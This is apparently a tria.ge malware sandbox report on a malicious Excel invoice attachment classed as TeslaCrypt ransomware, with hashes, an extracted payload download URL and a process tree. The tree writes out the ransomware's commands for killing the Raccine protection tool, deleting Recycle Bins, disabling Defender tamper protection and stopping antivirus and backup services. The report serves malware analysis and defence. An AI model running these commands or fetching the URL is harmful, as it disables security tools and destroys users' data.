Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
151s -
max time network
93s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
22/01/2021, 07:41
Static task
static1
Behavioral task
behavioral1
Sample
invoice_NQ_Supply.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
invoice_NQ_Supply.xls
Resource
win10v20201028
General
-
Target
invoice_NQ_Supply.xls
-
Size
83KB
-
MD5
50fecec126570e4b8fcd531d6711879a
-
SHA1
9166aee4a6815e4f67e0ae43344d8ca144958d47
-
SHA256
c7e40628fb6beb52d9d73a3b3afd1dca5d2335713593b698637e1a47b42bfc71
-
SHA512
5f6d88626024811fd05af98d35a2e54a87ce5c8929d56c8bc49d718417b3370af7aa9a66c46007c600c5ec608a0f91f1e952738ee35cd3aebe28b4db46a2c042
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
Extracted
https://iffusedtrac.xyz/3/bbc.exe
Signatures
-
TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.
-
Executes dropped EXE 2 IoCs
pid Process 1052 GZTJoxx.exe 560 wqm58yk7.exe -
Modifies Windows Firewall 1 TTPs
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk wqm58yk7.exe -
Loads dropped DLL 2 IoCs
pid Process 1856 EXCEL.EXE 1052 GZTJoxx.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features wqm58yk7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" wqm58yk7.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 6 IoCs
resource yara_rule behavioral1/files/0x0004000000013105-6.dat nsis_installer_1 behavioral1/files/0x0004000000013105-6.dat nsis_installer_2 behavioral1/files/0x0004000000013105-8.dat nsis_installer_1 behavioral1/files/0x0004000000013105-8.dat nsis_installer_2 behavioral1/files/0x0004000000013105-10.dat nsis_installer_1 behavioral1/files/0x0004000000013105-10.dat nsis_installer_2 -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Kills process with taskkill 1 IoCs
pid Process 924 taskkill.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1620 reg.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1856 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe 560 wqm58yk7.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 560 wqm58yk7.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeDebugPrivilege 924 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 560 wqm58yk7.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 560 wqm58yk7.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 1856 EXCEL.EXE 1856 EXCEL.EXE 1856 EXCEL.EXE 1856 EXCEL.EXE 1856 EXCEL.EXE 1856 EXCEL.EXE 1856 EXCEL.EXE 1856 EXCEL.EXE 1856 EXCEL.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1856 wrote to memory of 1052 1856 EXCEL.EXE 31 PID 1856 wrote to memory of 1052 1856 EXCEL.EXE 31 PID 1856 wrote to memory of 1052 1856 EXCEL.EXE 31 PID 1856 wrote to memory of 1052 1856 EXCEL.EXE 31 PID 1052 wrote to memory of 560 1052 GZTJoxx.exe 33 PID 1052 wrote to memory of 560 1052 GZTJoxx.exe 33 PID 1052 wrote to memory of 560 1052 GZTJoxx.exe 33 PID 1052 wrote to memory of 560 1052 GZTJoxx.exe 33 PID 560 wrote to memory of 1580 560 wqm58yk7.exe 35 PID 560 wrote to memory of 1580 560 wqm58yk7.exe 35 PID 560 wrote to memory of 1580 560 wqm58yk7.exe 35 PID 560 wrote to memory of 1580 560 wqm58yk7.exe 35 PID 560 wrote to memory of 924 560 wqm58yk7.exe 37 PID 560 wrote to memory of 924 560 wqm58yk7.exe 37 PID 560 wrote to memory of 924 560 wqm58yk7.exe 37 PID 560 wrote to memory of 924 560 wqm58yk7.exe 37 PID 560 wrote to memory of 1156 560 wqm58yk7.exe 39 PID 560 wrote to memory of 1156 560 wqm58yk7.exe 39 PID 560 wrote to memory of 1156 560 wqm58yk7.exe 39 PID 560 wrote to memory of 1156 560 wqm58yk7.exe 39 PID 560 wrote to memory of 1620 560 wqm58yk7.exe 40 PID 560 wrote to memory of 1620 560 wqm58yk7.exe 40 PID 560 wrote to memory of 1620 560 wqm58yk7.exe 40 PID 560 wrote to memory of 1620 560 wqm58yk7.exe 40 PID 560 wrote to memory of 2016 560 wqm58yk7.exe 43 PID 560 wrote to memory of 2016 560 wqm58yk7.exe 43 PID 560 wrote to memory of 2016 560 wqm58yk7.exe 43 PID 560 wrote to memory of 2016 560 wqm58yk7.exe 43 PID 560 wrote to memory of 2020 560 wqm58yk7.exe 45 PID 560 wrote to memory of 2020 560 wqm58yk7.exe 45 PID 560 wrote to memory of 2020 560 wqm58yk7.exe 45 PID 560 wrote to memory of 2020 560 wqm58yk7.exe 45 PID 560 wrote to memory of 1752 560 wqm58yk7.exe 47 PID 560 wrote to memory of 1752 560 wqm58yk7.exe 47 PID 560 wrote to memory of 1752 560 wqm58yk7.exe 47 PID 560 wrote to memory of 1752 560 wqm58yk7.exe 47 PID 560 wrote to memory of 1868 560 wqm58yk7.exe 48 PID 560 wrote to memory of 1868 560 wqm58yk7.exe 48 PID 560 wrote to memory of 1868 560 wqm58yk7.exe 48 PID 560 wrote to memory of 1868 560 wqm58yk7.exe 48 PID 560 wrote to memory of 1356 560 wqm58yk7.exe 55 PID 560 wrote to memory of 1356 560 wqm58yk7.exe 55 PID 560 wrote to memory of 1356 560 wqm58yk7.exe 55 PID 560 wrote to memory of 1356 560 wqm58yk7.exe 55 PID 560 wrote to memory of 1136 560 wqm58yk7.exe 54 PID 560 wrote to memory of 1136 560 wqm58yk7.exe 54 PID 560 wrote to memory of 1136 560 wqm58yk7.exe 54 PID 560 wrote to memory of 1136 560 wqm58yk7.exe 54 PID 560 wrote to memory of 660 560 wqm58yk7.exe 52 PID 560 wrote to memory of 660 560 wqm58yk7.exe 52 PID 560 wrote to memory of 660 560 wqm58yk7.exe 52 PID 560 wrote to memory of 660 560 wqm58yk7.exe 52 PID 560 wrote to memory of 1552 560 wqm58yk7.exe 57 PID 560 wrote to memory of 1552 560 wqm58yk7.exe 57 PID 560 wrote to memory of 1552 560 wqm58yk7.exe 57 PID 560 wrote to memory of 1552 560 wqm58yk7.exe 57 PID 560 wrote to memory of 1624 560 wqm58yk7.exe 59 PID 560 wrote to memory of 1624 560 wqm58yk7.exe 59 PID 560 wrote to memory of 1624 560 wqm58yk7.exe 59 PID 560 wrote to memory of 1624 560 wqm58yk7.exe 59 PID 560 wrote to memory of 1044 560 wqm58yk7.exe 81 PID 560 wrote to memory of 1044 560 wqm58yk7.exe 81 PID 560 wrote to memory of 1044 560 wqm58yk7.exe 81 PID 560 wrote to memory of 1044 560 wqm58yk7.exe 81
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\invoice_NQ_Supply.xls1⤵
- Loads dropped DLL
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\wCmfmRe\dtwzrQf\GZTJoxx.exe"C:\wCmfmRe\dtwzrQf\GZTJoxx.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe"C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe"3⤵
- Executes dropped EXE
- Drops startup file
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F4⤵PID:1156
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F4⤵
- Modifies registry key
PID:1620
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F4⤵PID:2016
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin4⤵PID:2020
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto4⤵PID:1752
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled4⤵PID:1868
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled4⤵PID:660
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin4⤵PID:1136
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto4⤵PID:1356
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled4⤵PID:1552
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes4⤵PID:1624
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto4⤵PID:936
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes4⤵PID:1264
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start Dnscache /y4⤵PID:1376
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Dnscache /y5⤵PID:2224
-
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled4⤵PID:1548
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start FDResPub /y4⤵PID:820
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start FDResPub /y5⤵PID:2216
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start SSDPSRV /y4⤵PID:324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV /y5⤵PID:2248
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y4⤵PID:1664
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y5⤵PID:2276
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y4⤵PID:1380
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y5⤵PID:2256
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y4⤵PID:2024
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y5⤵PID:2148
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop bedbg /y4⤵PID:1684
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y5⤵PID:2240
-
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto4⤵PID:1044
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQL_2008 /y4⤵PID:436
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y5⤵PID:2208
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EhttpSrv /y4⤵PID:800
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y5⤵PID:2268
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y4⤵PID:956
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y5⤵PID:2156
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start upnphost /y4⤵PID:1900
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost /y5⤵PID:2164
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y4⤵PID:2056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y5⤵PID:2184
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y4⤵PID:2084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y5⤵PID:2232
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y4⤵PID:2112
-
-
-